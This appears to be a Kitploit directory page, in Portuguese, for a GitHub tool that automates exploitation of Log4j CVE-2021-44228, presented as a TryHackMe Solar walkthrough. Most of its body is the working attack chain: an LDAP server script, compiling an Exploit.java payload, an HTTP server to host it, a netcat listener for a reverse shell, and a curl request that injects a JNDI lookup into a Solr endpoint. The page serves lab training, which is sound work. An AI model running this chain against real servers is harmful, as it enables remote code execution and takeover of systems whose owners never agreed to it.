Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4j — Exploração automatizada do Log4j CVE-2021-44228 com servidor LDAP e compilação de payload, incluindo um passo a passo para o desafio Solar do TryHackMe. | Kitploit
Ferramentas/GitHubGitHub/h3x0v3rl0rd/log4j
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubh3x0v3rl0rd/log4j

log4j

Exploração automatizada do Log4j CVE-2021-44228 com servidor LDAP e compilação de payload, incluindo um passo a passo para o desafio Solar do TryHackMe.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

💻 -h3x0v3rl0rd-

explorando log4j CVE-2021-44228 (TryHackMe Solar, Walkthrough)

root@kitploit:~
git clone https://github.com/n3rdh4x0r/log4j.git 

1. execute log4j.py (Isso instalará todos os aplicativos necessários e iniciará o servidor LDAP)

root@kitploit:~
ifconfig tun0
python3 log4j.py 10.8.227.251

image

2. Adicione o IP do atacante ao arquivo Exploit.java

2021-12-19_00-52

3. Compile o payload

root@kitploit:~
javac Exploit.java -source 8 -target 8

image

4. servidor HTTP temporário

root@kitploit:~
python3 -m http.server 8888

image

5. listener do netcat

root@kitploit:~
nc -lnvp 9999

image

6. Finalmente, tudo o que resta fazer é acionar o exploit e disparar nossa sintaxe JNDI! Observe as mudanças no número da porta (agora referente ao nosso servidor LDAP) e no recurso que recuperamos, especificando nosso exploit:

root@kitploit:~
curl 'http://10.10.45.175:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.227.251:1389/Exploit\}'

image

image

Baixar ferramenta